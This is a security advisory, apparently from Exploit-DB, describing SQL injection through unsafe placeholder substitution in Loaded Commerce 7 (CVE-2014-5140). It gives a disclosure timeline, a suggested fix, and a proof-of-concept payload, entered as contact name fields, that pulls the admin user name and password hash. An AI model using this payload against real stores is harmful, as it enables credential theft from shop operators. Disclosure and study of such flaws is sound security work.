LoadedCommerce7 Systemic Query Factory Vulnerability

vendor:

LoadedCommerce7

by:

Breaking Technology Research Labs

8,8

CVSS

HIGH

SQL injection, unsafe string replacement

CWE

Product Name: LoadedCommerce7

Affected Version From: Loaded Commerce 7

Affected Version To: Loaded Commerce 7

Patch Exists: YES

Related CWE: CVE-2014-5140

CPE: a:loadedcommerce:loaded_commerce_7

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2014

LoadedCommerce7 Systemic Query Factory Vulnerability

Loaded Commerce 7 shopping cart/online store suffers from a systemic vulnerability in its query factory, allowing attackers to circumvent user input sanitizing to perform remote SQL injection. Have a valid customer account and create a new contact in your address book using the following values. First name: :entry_lastname, Last Name : ,(select user_name from lc_administrators order by id asc limit 1),(select user_password from lc_administrators order by id asc limit 1),3,4,5,6,7,8,9,10)# The new contact will be added to your address book with the admin hash as the contact's street address

Mitigation:

Sanitize all user input before using it as any part of a query-- specifically remove or encode the colon (:) character before passing it to a query value.

Source

Exploit-DB raw data:

Title:     LoadedCommerce7 Systemic Query Factory Vulnerability

Advisory:  http://breaking.technology/advisories/CVE-2014-5140.txt

Credits:   Discovered by Breaking Technology Research Labs 2014-06-30

Reference: CVE-2014-5140 - Assigned 31 June 2014

Timeline:
           Vendor notified - 29 July 2014
           Vendor confirmed exploit 30 July 2014


Severity:           Critical
Attack Complexity:  Minimal
Classification:     SQL injection, unsafe string replacement

Description:

	Loaded Commerce 7 shopping cart/online store suffers from a systemic vulnerability in its query factory, allowing attackers to circumvent user input sanitizing to perform remote SQL injection.

Proof of Concept:

	Have a valid customer account and create a new contact in your address book using the following values.


	First name: :entry_lastname,
	Last Name : ,(select user_name from lc_administrators order by id asc limit 1),(select user_password from lc_administrators order by id asc limit 1),3,4,5,6,7,8,9,10)#

	The new contact will be added to your address book with the admin hash as the contact's street address

Suggested Fix:
	Sanitize all user input before using it as any part of a query-- specifically remove or encode the colon (:) character before passing it to a query value.  A similar fix was issued for tomatocart, available at
        https://github.com/tomatocart/TomatoCart-v1/pull/238